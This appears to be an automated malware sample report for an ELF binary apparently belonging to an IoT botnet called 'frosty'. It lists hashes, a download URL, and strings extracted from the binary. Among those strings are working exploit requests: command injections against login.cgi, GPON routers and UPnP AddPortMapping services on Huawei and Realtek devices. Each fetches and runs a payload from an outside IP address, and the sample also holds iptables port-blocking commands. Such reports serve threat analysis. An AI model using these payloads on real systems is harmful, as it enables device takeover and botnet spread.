
Sample details: 9004a60d57a2e7425118a0106ebba3f4 --

Hashes
MD5: 9004a60d57a2e7425118a0106ebba3f4
SHA1: 7e9dc4cdca3f532c1102e4cbeee6fbc4b90db6d5
SHA256: d8d7f55c5980b627eaa709fe87514dc7703a6215f96efaa34135f800eec36f13
SSDEEP: 1536:iabtOyNKy9ectDwawpNxIy7MtLECSASgHf:icNKyt2Ay7MtLE
Details
File Type: ELF
Yara Hits
Source
http://68.183.41.164/bins/frosty.sh4
Strings
		/sm"O,
qsj !<
Lds`La
Lds`La
AmH|g;"'
2)'#a)#)A
AmB{!+#;!
AmH|g;"'
2)'#a)#)A
AmB{!+#;!
&	tpgc`
"ca!# 
P)'#a)#
AmB{!+#;!
^]cla\
APe|l3j
)'#a)#
AmB{!+#;!
2-a#`)@
/s`miCWDX
	t@bsa9'
`)A|1)@,b9(
C)#8#a
B<cmA{"A
3a9'CV9")A
C)#8#b
'2qsP9
B<cmA{"C
3a9'CV9"
Cc,3Sf
C)#8#_
B<cmA{"B
3a9'CV9")A
"+'`7"
mHra,8
MK,;ba
"Bc#`ra
Gz#:"* 
f*!2-z#
Az"j!#c
ech3fsb
"ca:!#c
Cb+z":&#aj"R*
P2c003
3a9'CV9"
Cc,3Sf
C)#8#a
g3amA|1Qf
ql22,!!!%
'mA)B(C
B{";"$
a(1f1i
A3`\139
V2a,6f
Sb)BSa
h.d^cba|1
b:" !ba|1
" !ba|1
" !ba|1
Sb)BSa
h.d^cba|1
b:" !ba|1
" !ba|1
" !ba|1
r,aV11
CcKc8#
(w2"$qq
(w2"$qq
(w2"$qq
3e3a u
a,q3b2
sc&0(C
c`K [ h&
qQSRVSWTXUYVZW[
qVcVf(@Vg= Vhm#Vi}&Vj
#`K`cm
vra2"qS
bCa-GSP
r'WCa	
s"f8#r!
j"UCc!X
j#WCc"U
rCc$V#W
j%XCc$V
Cb\fca
x'R$x'
sarb(1
,93fsesh
nRR8##f
eQQ(1!A!A
A8#,13
#cL33d
BcAR2a3f&g
gb/#fba
2("!ba
=R;Q 1	
da)mf0a
(-b2Qq
Q-b"(]e
sc-Cy!sb
"{#;""*
/Ck"O;
GET /login.cgi?cli=aa%20aa%27;wget%20http://68.183.41.164/sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: /
User-Agent: Hakai/2.0
POST /UD/?9 HTTP/1.1
User-Agent: SEFA
Content-Type: text/xml
SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47449</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`>/tmp/.e && cd /tmp; >/var/dev/.e && cd /var/dev; wget http://68.183.41.164/icy.sh -O - > icy.sh; chmod 777 icy.sh; sh icy.sh; rm icy.sh; iptables -A INPUT -p tcp --destination-port 5555 -j DROP`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>
POST /GponForm/diag_Form?images/ HTTP/1.1
User-Agent: Hello, World
Accept: */*
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://68.183.41.164/bins/frosty.mips+-O+/tmp/egg;sh+/tmp/egg`&ipv=0
$(/bin/busybox wget -g 68.183.41.164 -l /tmp/.frosty.mips -r /bins/frosty.mips; /bin/busybox chmod 777 * /tmp/.frosty.mips; /tmp/.frosty.mips huawei.selfrep)
iptables -A INPUT -p tcp --destination-port 23 -j DROP
iptables -A INPUT -p tcp --destination-port 37215 -j DROP
POST /picdesc.xml HTTP/1.1
Host: 127.0.0.1:52869
Content-Length: 630
Accept-Encoding: gzip, deflate
SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Connection: keep-alive
<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47451</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /var; rm -rf zuki; wget http://68.183.41.164/bins/frosty.mips -O zuki; chmod 777 zuki; ./zuki realtek.selfrep`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>
POST /wanipcn.xml HTTP/1.1
Host: 127.0.0.1:52869
Content-Length: 630
Accept-Encoding: gzip, deflate
SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Connection: keep-alive
<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47451</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /var; rm -rf zuki; wget http://68.183.41.164/bins/frosty.mips -O zuki; chmod 777 zuki; ./zuki realtek.selfrep`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>
,9<0=$7
,7gaee
?8"efg
efg`ab
<=gael
75 edfm
5::=1fdef
5::=1fdeg
5::=1fde`
5::=1fdea
5::=1fdeb
?;d"=.,"
?;d509=:
758"=:
2=018efg
0125!8 
'!$$;& 
1$=7&;! 1&
9; ;&;85
93gadd
91&8=:
M$65&6SRS=
M$65&6SRS>B
/bin/sh
/dev/null
.shstrtab
.rodata
.ctors
.dtors